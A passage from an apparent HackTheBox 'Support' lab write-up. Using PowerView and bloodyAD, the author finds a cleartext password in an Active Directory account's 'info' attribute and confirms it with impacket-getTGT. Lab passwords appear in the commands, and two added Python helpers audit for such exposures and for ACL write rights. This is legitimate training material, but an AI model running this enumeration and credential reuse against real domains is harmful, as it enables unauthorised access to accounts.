AD Object
From the current scope of operation, further enumeration attempts made from both LDAPDomainDump and BloodHound provided concrete evidence of the support account being the most valuable target due to its exclusive memberships in both the Remote Management Users and Shared Support Accounts groups.
While BloodHound indeed revealed that there is no direct route to the support account from the compromised account, ldap, it would be paramount to inspect the AD object of the support account: CN=SUPPORT,CN=USERS,DC=SUPPORT,DC=HTB
While there are many ways to check AD objects with a compromised domain credential, I will start with the Python implementation of PowerView.
┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ KRB5CCNAME=ldap@dc.support.htb.ccache powerview 'SUPPORT.HTB/@dc.support.htb' --no-pass -k --dc-ip $IP -q 'Get-DomainObject "CN=SUPPORT,CN=USERS,DC=SUPPORT,DC=HTB"'
[2023-10-04 10:44:24] LDAP Signing NOT Enforced!
objectclass : top
person
organizationalPerson
user
cn : support
c : US
l : Chapel Hill
st : NC
postalcode : 27514
distinguishedname : CN=support,CN=Users,DC=support,DC=htb
instancetype : 4
whencreated : 20220528111200.0Z
whenchanged : 20220528111201.0Z
usncreated : 12617
info : Ironside47pleasure40Watchful
memberof : CN=Shared Support Accounts,CN=Users,DC=support,DC=htb
CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
usnchanged : 12630
company : support
streetaddress : Skipper Bowles Dr
name : support
objectguid : {3139a30a-31fa-4530-9ea4-8053b396a7f1}
useraccountcontrol : NORMAL_ACCOUNT
DONT_EXPIRE_PASSWORD
badpwdcount : 0
codepage : 0
countrycode : 0
badpasswordtime : 01/01/1601
lastlogoff : 0
lastlogon : 01/01/1601
pwdlastset : 05/28/2022
primarygroupid : 513
objectsid : S-1-5-21-1677581083-3380853377-188903654-1105
accountexpires : 9223372036854775807
logoncount : 0
samaccountname : support
samaccounttype : 805306368
objectcategory : CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
dscorepropagationdata : 20220528111201.0Z
16010101000000.0Z
Querying for the AD object of the support account reveals an interesting LDAP attribute: info.
The LDAP attribute info has its value set to what appears to be a CLEARTEXT password string: Ironside47pleasure40Watchful
It must be tested.
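The exposure shown above is a note-style attribute holding a credential. The following is an added audit helper, not code from the writeup or from PowerView: it parses the "attribute : value" layout that PowerView prints (continuation lines belong to the previous attribute) and flags free-text attributes whose value looks like a password. The sample object and its values are constructed; against a live directory the same check would be applied to the results of a search such as (&(objectClass=user)(|(info=*)(description=*)(comment=*))).

```python
"""Flag credential-like values in free-text LDAP attributes.
Added example, not part of the original writeup; it works on a
PowerView-style text dump and does not contact a domain controller."""
import re

# Attributes that administrators commonly (mis)use as note fields.
FREE_TEXT_ATTRS = ("info", "description", "comment")
# Heuristic: 8+ characters, no whitespace, contains letters and digits.
_PASSWORD_LIKE = re.compile(r"^(?=.*[A-Za-z])(?=.*\d)\S{8,}$")


def parse_powerview_object(text):
    """Parse 'attr : value' lines into {attr: [values]}.
    Lines without ' : ' continue the previous (multi-valued) attribute."""
    attrs, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if " : " in line:
            name, value = (part.strip() for part in line.split(" : ", 1))
            current = name.lower()
            attrs.setdefault(current, []).append(value)
        elif current:
            attrs[current].append(line)
    return attrs


def find_credential_like(attrs):
    """Return (attribute, value) pairs whose value looks like a password."""
    hits = []
    for name in FREE_TEXT_ATTRS:
        for value in attrs.get(name, []):
            if _PASSWORD_LIKE.match(value):
                hits.append((name, value))
    return hits


# Constructed sample modelled on the PowerView output above (placeholder values).
SAMPLE = """\
objectclass : top
person
user
cn : svc-example
info : Example47pleasure40Value
description : Service account for ticketing
samaccountname : svc-example
"""

if __name__ == "__main__":
    for attr, value in find_credential_like(parse_powerview_object(SAMPLE)):
        print(f"credential-like value in '{attr}': {value}")
```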
Validation
┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ impacket-getTGT support.htb/support@dc.support.htb -dc-ip $IP
Impacket v0.11.0 - Copyright 2023 Fortra
Password: Ironside47pleasure40Watchful
[*] Saving ticket in support@dc.support.htb.ccache
Validation complete and the password confirmed for the support account.
It was indeed a CLEARTEXT password hard-coded into an LDAP attribute.
A TGT was generated for better OPSEC.
ACL
┌──(kali㉿kali)-[~/archive/htb/labs/support]
└─$ bloodyAD -d SUPPORT.HTB -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' --host dc.support.htb get search support --resolve-sd
distinguishedname: CN=support,CN=Users,DC=support,DC=htb
accountexpires: 9999-12-31 23:59:59.999999+00:00
badpasswordtime: 1601-01-01 00:00:00+00:00
c: US
cn: support
company: support
dscorepropagationdata: 2022-05-28 11:12:01+00:00; 1601-01-01 00:00:00+00:00
info: Ironside47pleasure40Watchful
instancetype: 4
l: Chapel Hill
lastlogoff: 1601-01-01 00:00:00+00:00
lastlogon: 2023-10-04 09:03:52.093901+00:00
lastlogontimestamp: 2023-10-04 09:03:52.093901+00:00
logoncount: 1
memberof: CN=Shared Support Accounts,CN=Users,DC=support,DC=htb; CN=Remote Management Users,CN=Builtin,DC=support,DC=htb
ntsecuritydescriptor.owner: Domain Admins
ntsecuritydescriptor.control: DACL_AUTO_INHERITED|DACL_PRESENT|SACL_AUTO_INHERITED|SELF_RELATIVE
ntsecuritydescriptor.acl.0.type: == DENIED_OBJECT ==
ntsecuritydescriptor.acl.0.trustee: EVERYONE; PRINCIPAL_SELF
ntsecuritydescriptor.acl.0.right: CONTROL_ACCESS
ntsecuritydescriptor.acl.0.objecttype: User-Change-Password
ntsecuritydescriptor.acl.1.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.1.trustee: RAS and IAS Servers
ntsecuritydescriptor.acl.1.right: READ_PROP
ntsecuritydescriptor.acl.1.objecttype: Group-Membership; Logon-Information; Remote-Access-Information; Account-Restrictions
ntsecuritydescriptor.acl.2.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.2.trustee: Cert Publishers
ntsecuritydescriptor.acl.2.right: WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.2.objecttype: X509-Cert
ntsecuritydescriptor.acl.3.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.3.trustee: WINDOWS_AUTHORIZATION_ACCESS_GROUP
ntsecuritydescriptor.acl.3.right: READ_PROP
ntsecuritydescriptor.acl.3.objecttype: Token-Groups-Global-And-Universal
ntsecuritydescriptor.acl.4.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.4.trustee: TERMINAL_SERVER_LICENSE_SERVERS
ntsecuritydescriptor.acl.4.right: WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.4.objecttype: Terminal-Server-License-Server; Terminal-Server
ntsecuritydescriptor.acl.5.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.5.trustee: PRINCIPAL_SELF
ntsecuritydescriptor.acl.5.right: CONTROL_ACCESS
ntsecuritydescriptor.acl.5.objecttype: Send-As; Receive-As
ntsecuritydescriptor.acl.6.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.6.trustee: AUTHENTICATED_USERS
ntsecuritydescriptor.acl.6.right: READ_PROP
ntsecuritydescriptor.acl.6.objecttype: Public-Information; Web-Information; Personal-Information; General-Information
ntsecuritydescriptor.acl.7.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.7.trustee: PRINCIPAL_SELF
ntsecuritydescriptor.acl.7.right: WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.7.objecttype: Web-Information; Personal-Information; Phone-and-Mail-Options
ntsecuritydescriptor.acl.8.type: == ALLOWED ==
ntsecuritydescriptor.acl.8.trustee: Domain Admins; ACCOUNT_OPERATORS; LOCAL_SYSTEM
ntsecuritydescriptor.acl.8.right: GENERIC_ALL
ntsecuritydescriptor.acl.8.objecttype: Self
ntsecuritydescriptor.acl.9.type: == ALLOWED ==
ntsecuritydescriptor.acl.9.trustee: AUTHENTICATED_USERS
ntsecuritydescriptor.acl.9.right: READ_SD
ntsecuritydescriptor.acl.9.objecttype: Self
ntsecuritydescriptor.acl.10.type: == ALLOWED ==
ntsecuritydescriptor.acl.10.trustee: PRINCIPAL_SELF
ntsecuritydescriptor.acl.10.right: GENERIC_READ
ntsecuritydescriptor.acl.10.objecttype: Self
ntsecuritydescriptor.acl.11.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.11.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.11.right: READ_PROP
ntsecuritydescriptor.acl.11.objecttype: Account-Restrictions; Remote-Access-Information; Logon-Information; Group-Membership; General-Information
ntsecuritydescriptor.acl.11.inheritedobjecttype: inetOrgPerson
ntsecuritydescriptor.acl.11.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.12.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.12.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.12.right: READ_PROP
ntsecuritydescriptor.acl.12.objecttype: Account-Restrictions; Remote-Access-Information; Logon-Information; Group-Membership; General-Information
ntsecuritydescriptor.acl.12.inheritedobjecttype: User
ntsecuritydescriptor.acl.12.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.13.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.13.trustee: Enterprise Key Admins; Key Admins
ntsecuritydescriptor.acl.13.right: WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.13.objecttype: ms-DS-Key-Credential-Link
ntsecuritydescriptor.acl.13.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.14.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.14.trustee: PRINCIPAL_SELF; CREATOR_OWNER
ntsecuritydescriptor.acl.14.right: WRITE_VALIDATED
ntsecuritydescriptor.acl.14.objecttype: DS-Validated-Write-Computer
ntsecuritydescriptor.acl.14.inheritedobjecttype: Computer
ntsecuritydescriptor.acl.14.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.15.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.15.trustee: ENTERPRISE_DOMAIN_CONTROLLERS
ntsecuritydescriptor.acl.15.right: READ_PROP
ntsecuritydescriptor.acl.15.objecttype: Token-Groups
ntsecuritydescriptor.acl.15.inheritedobjecttype: Group; Computer
ntsecuritydescriptor.acl.15.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.16.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.16.trustee: ENTERPRISE_DOMAIN_CONTROLLERS
ntsecuritydescriptor.acl.16.right: READ_PROP
ntsecuritydescriptor.acl.16.objecttype: Token-Groups
ntsecuritydescriptor.acl.16.inheritedobjecttype: User
ntsecuritydescriptor.acl.16.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.17.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.17.trustee: PRINCIPAL_SELF
ntsecuritydescriptor.acl.17.right: WRITE_PROP
ntsecuritydescriptor.acl.17.objecttype: ms-TPM-Tpm-Information-For-Computer
ntsecuritydescriptor.acl.17.inheritedobjecttype: Computer
ntsecuritydescriptor.acl.17.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.18.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.18.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.18.right: GENERIC_READ
ntsecuritydescriptor.acl.18.objecttype: Self
ntsecuritydescriptor.acl.18.inheritedobjecttype: Group; inetOrgPerson
ntsecuritydescriptor.acl.18.flags: CONTAINER_INHERIT; INHERIT_ONLY; INHERITED
ntsecuritydescriptor.acl.19.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.19.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.19.right: GENERIC_READ
ntsecuritydescriptor.acl.19.objecttype: Self
ntsecuritydescriptor.acl.19.inheritedobjecttype: User
ntsecuritydescriptor.acl.19.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.20.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.20.trustee: PRINCIPAL_SELF
ntsecuritydescriptor.acl.20.right: WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.20.objecttype: ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity
ntsecuritydescriptor.acl.20.flags: CONTAINER_INHERIT; INHERITED; OBJECT_INHERIT
ntsecuritydescriptor.acl.21.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.21.trustee: PRINCIPAL_SELF
ntsecuritydescriptor.acl.21.right: CONTROL_ACCESS|WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.21.objecttype: Private-Information
ntsecuritydescriptor.acl.21.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.22.type: == ALLOWED ==
ntsecuritydescriptor.acl.22.trustee: Enterprise Admins
ntsecuritydescriptor.acl.22.right: GENERIC_ALL
ntsecuritydescriptor.acl.22.objecttype: Self
ntsecuritydescriptor.acl.22.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.23.type: == ALLOWED ==
ntsecuritydescriptor.acl.23.trustee: ALIAS_PREW2KCOMPACC
ntsecuritydescriptor.acl.23.right: LIST_CHILD
ntsecuritydescriptor.acl.23.objecttype: Self
ntsecuritydescriptor.acl.23.flags: CONTAINER_INHERIT; INHERITED
ntsecuritydescriptor.acl.24.type: == ALLOWED ==
ntsecuritydescriptor.acl.24.trustee: BUILTIN_ADMINISTRATORS
ntsecuritydescriptor.acl.24.right: WRITE_OWNER|WRITE_DACL|GENERIC_READ|DELETE|CONTROL_ACCESS|WRITE_PROP|WRITE_VALIDATED|CREATE_CHILD
ntsecuritydescriptor.acl.24.objecttype: Self
ntsecuritydescriptor.acl.24.flags: CONTAINER_INHERIT; INHERITED
name: support
objectcategory: CN=Person,CN=Schema,CN=Configuration,DC=support,DC=htb
objectclass: top; person; organizationalPerson; user
objectguid: {3139a30a-31fa-4530-9ea4-8053b396a7f1}
objectsid: S-1-5-21-1677581083-3380853377-188903654-1105
postalcode: 27514
primarygroupid: 513
pwdlastset: 2022-05-28 11:12:00.977707+00:00
samaccountname: support
samaccounttype: 805306368
st: NC
streetaddress: Skipper Bowles Dr
usnchanged: 82013
usncreated: 12617
useraccountcontrol: NORMAL_ACCOUNT; DONT_EXPIRE_PASSWORD
whenchanged: 2023-10-04 09:03:52+00:00
whencreated: 2022-05-28 11:12:00+00:00
Much like the Python implementation of PowerView, bloodyAD can be used to enumerate the AD object. Additionally, it can also list the resolved ACL of a given AD object.
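bloodyAD prints the resolved security descriptor as flattened ntsecuritydescriptor.acl.N.field lines, which is hard to review by eye over two dozen ACEs. The following is an added helper, not bloodyAD's own code: it regroups those lines into ACE records and lists every trustee granted a write-class right on the object, which is what an ACL review of a user object looks for. The sample lines are constructed from a subset of the entries shown above.

```python
"""Regroup bloodyAD's flattened ACL output into ACEs and report trustees
holding write-class rights. Added example, not part of bloodyAD."""
import re
from collections import defaultdict

ACE_LINE = re.compile(r"^ntsecuritydescriptor\.acl\.(\d+)\.(\w+):\s*(.*)$")
# Rights that let a trustee alter the object or its access control.
WRITE_CLASS = {"GENERIC_ALL", "WRITE_DACL", "WRITE_OWNER",
               "WRITE_PROP", "CONTROL_ACCESS"}


def parse_aces(text):
    """Return {index: {field: value}} for every ACE in the dump."""
    aces = defaultdict(dict)
    for line in text.splitlines():
        m = ACE_LINE.match(line.strip())
        if m:
            aces[int(m.group(1))][m.group(2)] = m.group(3).strip()
    return dict(aces)


def write_capable_trustees(aces):
    """Return (trustee, right, objecttype) for each ALLOWED ACE that carries
    a write-class right; DENIED ACEs are skipped, multi-trustee ACEs split."""
    out = []
    for idx in sorted(aces):
        ace = aces[idx]
        if "DENIED" in ace.get("type", ""):
            continue
        if set(ace.get("right", "").split("|")) & WRITE_CLASS:
            for trustee in ace.get("trustee", "").split("; "):
                out.append((trustee, ace["right"], ace.get("objecttype", "")))
    return out


# Constructed sample: a subset of the bloodyAD lines shown above.
SAMPLE = """\
ntsecuritydescriptor.acl.0.type: == DENIED_OBJECT ==
ntsecuritydescriptor.acl.0.trustee: EVERYONE; PRINCIPAL_SELF
ntsecuritydescriptor.acl.0.right: CONTROL_ACCESS
ntsecuritydescriptor.acl.0.objecttype: User-Change-Password
ntsecuritydescriptor.acl.1.type: == ALLOWED_OBJECT ==
ntsecuritydescriptor.acl.1.trustee: Cert Publishers
ntsecuritydescriptor.acl.1.right: WRITE_PROP|READ_PROP
ntsecuritydescriptor.acl.1.objecttype: X509-Cert
ntsecuritydescriptor.acl.2.type: == ALLOWED ==
ntsecuritydescriptor.acl.2.trustee: Domain Admins; ACCOUNT_OPERATORS
ntsecuritydescriptor.acl.2.right: GENERIC_ALL
ntsecuritydescriptor.acl.2.objecttype: Self
"""

if __name__ == "__main__":
    for trustee, right, objtype in write_capable_trustees(parse_aces(SAMPLE)):
        print(f"{trustee}: {right} on {objtype}")
```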